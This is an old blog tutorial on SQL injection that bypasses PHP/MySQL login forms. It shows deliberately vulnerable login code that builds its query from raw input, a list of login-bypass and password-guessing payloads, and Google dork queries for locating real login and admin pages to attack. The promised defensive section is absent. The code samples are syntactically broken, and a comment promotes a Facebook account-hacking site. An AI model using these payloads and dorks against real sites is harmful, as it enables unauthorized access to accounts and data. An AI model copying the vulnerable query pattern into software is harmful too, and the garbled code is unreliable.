Friday, September 9, 2011

SQL injection basics(bypass the login form)

In this tutorial I will be explaining What is SQL(Its structure), what is SQL injection? how to perform the attack? and how to make your website safe from such kinds of attacks. Before you read any article on sql injection I recommend you to read this first. In this tutorial I will be using MySQL and PHP. I have chosen PHP since it is most widely used language and and in most of the cases MySQL is used as database with PHP. PHP is a web scripting language like ASP, JSP, CGI....You need not learn this attack in every language, the concept of attack remains same for all the languages.

Basics of SQL:
The structure of SQL is divided into:
SQL server-> Databases->Tables-> Columns and Rows.
Sql server: is an application which runs on server side of the application and serves the request as per the command given in client side.
Database: This is a kind of container where particular applications related tables are kept.
Tables: It stores the data in the form of rows and columns.

SQL Injection: Introduction

It is the most widely used technique of hacking since most of the websites today maintain database. SQL Injection is a code(sql) injection technique because of the improper filtration of users input. Lets see a basic injection attack:


Bypassing the login form
Lets consider a login form login.php

if (isset($_POST['submit'])) 

$username=$_POST['username'];
$password=$_POST['pass']
$check=mysql_query("SELECT * FROM member WHERE username = ' $username' and password=$password");
$check2 = mysql_num_rows($check);

if ($check2 == 0) 
     echo "login failed";
else
header("location: members.php);
}
else
{

<form action="login.php" method="post" name="login"> 
<h1>USERLOGIN</h1><br/>
Username:<input type="text" name="username"
<br/><br/>
Password:
<input type="password" name="pass"
<input type="submit" name="submit" value="Login"> </form> 


This is not the exact login form just to give you a feel how exactly login form works i have written this code. Just focus on the dark shaded portions of the code, as you can see the login details is sent via "post" method as soon as the submit button is clicked, after clicking the submit button the PHP code will run as "isset" condition is true. Now lets see what happens in the background, the select function tries to fetch the details from the "member" table by comparing the username and password sent from to the username and password inside the member table. Clearly the code which I have written is vulnerable, lets see how?
Consider a situation I have given input something like below:
Username: ' or 'a'='a'
Password: ' or 'a'='a'
Now lets see what happens in the background i.e. in select staement:
select * from member where username=' ' or 'a'='a' and password=' ' or 'a'='a'
Now if you see carefully the two shaded portions, they both results "true". That means our username and password is accepted.
Some other username and password combination which can come handy for SQL injection:


Username: ' or 'a'=a');--
Password: anything



Username: ' or 'a'=a';--
Password: anything

select * from member where username=' ' or 'a'='a');-- and password=' ' or '1'='1'
the command after "--" will act as comment.


Bypassing admin login form. In most of the cases the cases the username for administrator field is "admin" which can be useful when we are injecting code. Lets see:
Username: admin;--
Password: anything



Username: admin);--
Password: anything


Now consider a situation where you know the username and few letters of password, in such cases you can try the following:


Username:' OR EXISTS(SELECT * FROM users WHERE username='admin' AND password LIKE '%a%') AND ''='
password:' OR EXISTS(SELECT * FROM users WHERE username='admin' AND password LIKE '%a%') AND ''='


We can use google dorks to find login page:
Example type: inurl:login or inurl:login.php or inurl:adminlogin or intitle:login in Google search box.

Note: It is not necessary that these combinations will always work. It will depend on the way the script engine is programmed.


2 comments:

  1. Nice post! amazing your posts. I hope you can post more helpful articles. I found a website that we can hack any our friends facebook account within minutes. Check out below link:

    www.hack-fb-online.com

    ReplyDelete